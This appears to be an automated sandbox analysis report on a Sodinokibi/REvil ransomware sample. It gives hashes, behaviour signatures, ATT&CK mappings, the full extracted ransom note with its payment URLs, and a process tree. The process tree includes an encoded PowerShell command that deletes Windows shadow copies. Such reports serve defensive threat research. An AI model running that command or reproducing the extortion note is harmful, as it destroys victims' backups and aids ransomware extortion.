Analysis

  • max time kernel
    163s
  • max time network
    163s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 02:18

General

  • Target

    338e8f24eeb38b5ef67ef662b65d592c816eba94dfaaac856021dac407daf294.exe

  • Size

    164KB

  • MD5

    327bd8a60fb54aaaba8718c890dda09d

  • SHA1

    11dc514565e12025e33668e9f41b99353db4628e

  • SHA256

    338e8f24eeb38b5ef67ef662b65d592c816eba94dfaaac856021dac407daf294

  • SHA512

    23ef833c7873085d8d3867f99ccebbf26244d74d59c977cfc8cf911e80539ce28f209ff9aac7a489147315a4b72f50b54713cce72bc7896e783aa15f818224e9

Score
10/10

Malware Config

Extracted

Path

C:\t55fsxuuv-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion t55fsxuuv. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E863746DACC052E1 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/E863746DACC052E1 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: fzYV76UtO2XdxbRiGtkJj88uaHY1JJy7M0t4Q9XYXf4Wg+eYipG8FmeqcC5XUyKQ nWURBBvuomxWGkStHOi7VMSNes5T0VfwTlL1O6jrXofECDy05/rMf48rjqQcih2s KNoEV9EEwN050PHTl5S3XTo9nZukTDENPaxHqdUvSvj2N+eXpmapquUNKdS4JSk7 DMGAxgr7YcOBreC+sbSwBu4tXNQPgSJTx+Wtu2+Irs2BQ72KWIhH1naJPIdp9y1M e7RXXEQH4J3GWy31DkCntf5RDDx8hM2ju7/voGXdpXb4pMPpGNKjCcXFXNYnNFh/ NourLT3AKTw6WtPKzfIBWtdfn2J2hV7oVeIl7hkNIprNb/u2taOD/6eVYoufBztg 97kP5rMaoD+DEQuCnmlQRfmIBhYOJzXYVBZ2EbG7aU4UAkKP9A2zxbuuUL4F6BEr 2p1nPwmuHcpAPZQ2QHOBC1mWVKRJqCVrFHZBGWFhliib4Lx613YwVyT7aTGNfy1R 3Z7llqOJcyBdOJGDbhxNM34jMcjqv7LqavIKZPfIemGLICeINaXmn+y93UOIFxRq WV+ylUcg24RryMQMZ7vrWhm88fpXXAnBUwq0Dr677ybXSv3swu3/m1mOeSyPNNSO kldNKuk+iHGgYDRxFLFXnpToDPgEp8A+SaUcCrw3d/Pn3VwnA6vH1oVdctH6J7tj nSqSZX/rW4UgX9GM7eelCKng9PvRhO4S+TkiT+gkUV283XecwM65nkd5qZhftOqa 9D3NCOxf76Lj7Jj5kDI0XnYAfh3iY0fReINRa9S3hwTQQ9D2QUFkIhim+iiXhD8r 2XXkgZrbjqcJ/rV7Czhlo2oCMJPacK8xMZNZV//f1FTZ1V0e11eGpmWlDCT5YEbD zrjYXZagU9/W2mEfm2qtsQfCAeoYYsQsnizzpjGaeWSpguqxedJnKANg/T/1Rfwb cLngVVw5EAsqh3FQpuYPlOMPicNe/e1tfDXkdrhAJxMSxZtcf3l2wrFS22FldtEF FXobdXSiAhQM9vwSyCsGj18qHYtAVIR+Q0BBS/R57tmHJBz8Mg8XwCGGTbMaseW6 M+IQ2/tzBOJjP9X2rqMw0Zm+WFBCxong2j61AvT+0+zYEpcra6tXoiPON5B53grw Extension name: t55fsxuuv ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E863746DACC052E1

http://decryptor.top/E863746DACC052E1

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\338e8f24eeb38b5ef67ef662b65d592c816eba94dfaaac856021dac407daf294.exe
    "C:\Users\Admin\AppData\Local\Temp\338e8f24eeb38b5ef67ef662b65d592c816eba94dfaaac856021dac407daf294.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3364
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3332
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1348

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3364-123-0x0000020DDBD40000-0x0000020DDBD62000-memory.dmp
      Filesize

      136KB

    • memory/3364-128-0x0000020DC1A60000-0x0000020DC1A62000-memory.dmp
      Filesize

      8KB

    • memory/3364-129-0x0000020DC1A63000-0x0000020DC1A65000-memory.dmp
      Filesize

      8KB

    • memory/3364-130-0x0000020DDBEF0000-0x0000020DDBF66000-memory.dmp
      Filesize

      472KB